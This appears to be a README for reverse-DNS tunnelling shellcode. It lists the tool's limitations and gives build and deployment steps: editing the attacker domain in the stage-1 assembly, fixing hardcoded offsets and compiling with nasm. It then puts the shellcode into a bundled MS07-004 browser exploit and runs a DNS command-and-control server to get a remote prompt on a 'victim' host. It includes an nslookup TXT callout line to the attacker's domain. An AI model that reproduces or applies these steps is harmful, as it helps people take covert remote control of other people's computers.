- stage 1 asm is currently hardcoded for tysblackhat.com- need to make a generator program so that this is dynamic
- stage2 shellcode creates files on the desktop of victim if it dies
- issues exist for requestId numbers greater than 99
- no WSAStartup so only works with internet connected software
- sleep is hardcoded
- GetProcAddress is hardcoded
- the server dies periodically, but no big deal since the probes continue, so you can start it back up and keep sending commands
- slow from command line due to DNS
- back slashes aren't escaped
- shellcode is memory resident and is not persistent
- It is not a console. It an interface to run a single command at a time.
- No environment carried between commands
- - navigation is useless. Listing directories done in one command.
- - i.e. useless to cd to a directory since the next command starts at the desktop again
1. Compile asc.c for alphanumeric encoding
gcc -o asc asc.c
2. Modify hardcoded domain in reverse-dns-shellcode-stage1-v03.asm
In future versions this will be automated via a generator program like for the stage 2 shellcode.
Towards the bottom you will find the following lines;
db 'nslookup -q=TXT -timeout=9 OBZG6YTF.0000-0000.0000.0001.tysblackhat.comN'
Change the domain from "tysblackhat.com" to be your domain.
This screws up a couple of hardcoded values in the shellcode that needs to be updated to reflect the size of your domain string. Locate the following lines and update the numbers based on the comments below;
mov [ecx + 71],dl ;71 is the length of the above db string without the "N". Update this to reflect your domain string length.
mov ecx,72 ;Here we have 72. Similarly change this but obviously add one to your value above.
mov dword [ebp-6070h],48h ;48h is the hex version of 72 ... Change your second value above to hex.
3. Compile the stage 1 shellcode
You need to have nasm, xxd and bash installed and in your path. I am using;
nasm version 2.03.01
xxd version V1.10
If you have this then run the following;
This will produce the following files and will also output some of this to STDOUT;
4. Insert the shellcode into your exploit
reverse-dns-shellcode-stage1-v03-ms07-004.html has been included just as a sample exploit that automatically gets the shellcode inserted.
5. Start the Reverse DNS Tunneling Shellcode DNS Server
I created a start script for this;
Edit this file to replace tysblackhat.com to contain your domain name, then run it.
This should drop you to an initial command prompt where you can enter your first command before you even send off your exploit. This is to ensure that we don't waste any DNS probes from the victim host so we run commands immediatly.
From here you basically send off your exploit and wait for the DNS Server to display "[Command Sent Over DNS]", which means it is go time!
You should now have a command prompt on your victim host tunneled over DNS.
Enjoy and keep an eye out for later versions of the shellcode.